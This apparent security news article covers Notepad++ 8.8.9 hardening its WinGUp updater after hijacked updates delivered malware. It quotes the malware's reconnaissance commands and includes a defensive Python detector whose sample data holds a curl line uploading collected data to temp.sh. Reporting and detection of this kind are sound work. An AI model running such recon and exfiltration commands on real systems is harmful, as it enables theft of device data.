
Notepad++ fixes flaw that let attackers push malicious update files


Notepad++ version 8.8.9 was released to fix a security weakness in its WinGUp update tool after researchers and users reported incidents in which the updater retrieved malicious executables instead of legitimate update packages.

The first signs of this issue appeared in a Notepad++ community forum topic, where a user reported that Notepad++'s update tool, GUP.exe (WinGUp), spawned an unknown "%Temp%\AutoUpdater.exe" executable that executed commands to collect device information.

According to the reporter, this malicious executable ran various reconnaissance commands and stored the output in a file called 'a.txt':

cmd /c netstat -ano >> a.txt
cmd /c systeminfo >> a.txt
cmd /c tasklist >> a.txt
cmd /c whoami >> a.txt

The autoupdater.exe malware then used the curl.exe command to exfiltrate the a.txt file to temp[.]sh, a file and text-sharing website previously used in malware campaigns.

As GUP uses the libcurl library rather than the actual 'curl.exe' command and does not collect this type of information, other Notepad++ users speculated that the user had installed an unofficial, malicious version of Notepad++ or that the autoupdate network traffic was hijacked.
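The chain the forum reporter described (GUP.exe spawning an executable from %Temp%, recon commands appended to a.txt, curl.exe uploading that file to temp.sh) is a compact detection case. As an added example that is not from the article or the Notepad++ project, this Python function flags that chain over constructed Sysmon-style process-creation events; the file paths, process ids and the temp.sh upload URL are assumptions made for illustration.

```python
# Added example: flag the reported updater-hijack process chain over
# constructed process-creation events (keys: pid, ppid, image, cmdline).
RECON_COMMANDS = ("netstat", "systeminfo", "tasklist", "whoami")
EXFIL_HOSTS = ("temp.sh",)  # site named in the report; extend with your own list


def suspicious_events(events):
    """Return (rule, pid) pairs for events matching the reported behaviour."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        image = e["image"].lower()
        cmd = e["cmdline"].lower()
        parent = by_pid.get(e["ppid"])
        parent_image = parent["image"].lower() if parent else ""
        # Rule 1: the updater (gup.exe) should never launch an executable
        # dropped under the user's Temp directory.
        if parent_image.endswith("\\gup.exe") and "\\temp\\" in image:
            hits.append(("updater_spawned_temp_exe", e["pid"]))
        # Rule 2: reconnaissance command whose output is appended to a.txt.
        if image.endswith("\\cmd.exe") and ">> a.txt" in cmd \
                and any(t in cmd for t in RECON_COMMANDS):
            hits.append(("recon_to_a_txt", e["pid"]))
        # Rule 3: curl.exe (not libcurl inside GUP) uploading a.txt to a
        # known file-sharing site.
        if image.endswith("\\curl.exe") and "a.txt" in cmd \
                and any(h in cmd for h in EXFIL_HOSTS):
            hits.append(("curl_exfil", e["pid"]))
    return hits


# Constructed sample events; paths, pids and the upload URL are assumptions.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Program Files\Notepad++\notepad++.exe",
     "cmdline": "notepad++.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Notepad++\updater\GUP.exe",
     "cmdline": "GUP.exe"},
    {"pid": 300, "ppid": 200, "image": r"C:\Users\alice\AppData\Local\Temp\AutoUpdater.exe",
     "cmdline": "AutoUpdater.exe"},
    {"pid": 301, "ppid": 300, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c systeminfo >> a.txt"},
    {"pid": 302, "ppid": 300, "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe -F file=@a.txt https://temp.sh/upload"},
    # Benign: an interactive whoami with no a.txt redirect should not fire.
    {"pid": 400, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c whoami"},
]

if __name__ == "__main__":
    for rule, pid in suspicious_events(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```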

To help mitigate potential network hijacks, Notepad++ developer Don Ho released version 8.8.8 on November 18th, so that updates can be downloaded only from GitHub.

As a stronger fix, Notepad++ 8.8.9 was released on December 9th; it refuses to install any update that is not signed with the developer's code-signing certificate.

"Starting with this release, Notepad++ & WinGUp have been hardened to verify the signature & certificate of downloaded installers during the update process. If verification fails, the update will be aborted," reads the Notepad++ 8.8.9 security notice.

Hijacked update URLs
